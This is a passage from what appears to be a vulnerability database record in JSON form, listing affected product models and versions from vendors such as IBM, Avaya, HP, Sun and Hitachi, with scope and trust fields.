"trust": 0.3, "vendor": "ibm", "version": "3.0.0.3" }, { "model": "linux enterprise server sp1 for vmware lt", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server h06.24", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.16.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.18.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "call management system r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "voice portal sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "nonstop server h06.19.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.21" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server light (windows", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00(x64)" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1.1" }, { "model": "java sdk sr13 fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "nonstop server j06.11.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.14" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "rational synergy", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.6" }, { "model": "nonstop server h06.20.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jre 10-b03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "nonstop server j06.05.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server j06.07.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise java sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "websphere cast iron cloud integration studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "tivoli federated identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "nonstop server h06.21.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus service platform aix", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00(64)" }, { "model": "cosminexus studio standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-04-00" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "infosphere replication server 10.2.0.0-b116", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security appscan enterprise", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "qradar risk manager 7.1mr2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "nonstop server j06.05.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "sdk 02", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "nonstop server h06.17.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "nonstop server j06.10.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "infosphere optim performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "nonstop server h06.17.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-60" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus application server express (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20(x6)" }, { "model": "nonstop server h06.15.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "infosphere replication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "nonstop server j06.14", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "sdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "nonstop server h06.26", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli federated identity manager business gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli business service manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "nonstop server j06.13", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.70" }, { "model": "nonstop server j06.09.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "call management system r16.2", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere cast iron cloud integration physical applian", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "ir", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "java se sr4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "nonstop server j06.05.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "java sdk sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.9" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "websphere cast iron cloud integration live saas offeri", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "java sdk sr1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "java sdk sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "nonstop server j06.09.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "nonstop server j06.06.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "qradar risk manager 7.1mr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational automation framework", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "linux enterprise server for vmware sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "java se sr1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "nonstop server h06.20.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "ucosminexus service platform hp-ux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "java sdk sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-53" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "servicecenter web tier", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.8" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "java se sr4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "interactive service manager web tier", "scope": "eq", "trust": 0.3, "vendor": "mercury", "version": "9.31" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "jre 28", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.4.2" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "infosphere replication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "rational service tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "nonstop server j06.04.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere partner gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java sdk sr16", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "meeting exchange webportal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "-6.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.32" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "ims enterprise suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.2" }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform linux", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00(x64)" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "java se sr12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "nonstop server h06.20.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "java sdk sr11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "linux enterprise desktop sp2", "scope": "eq", 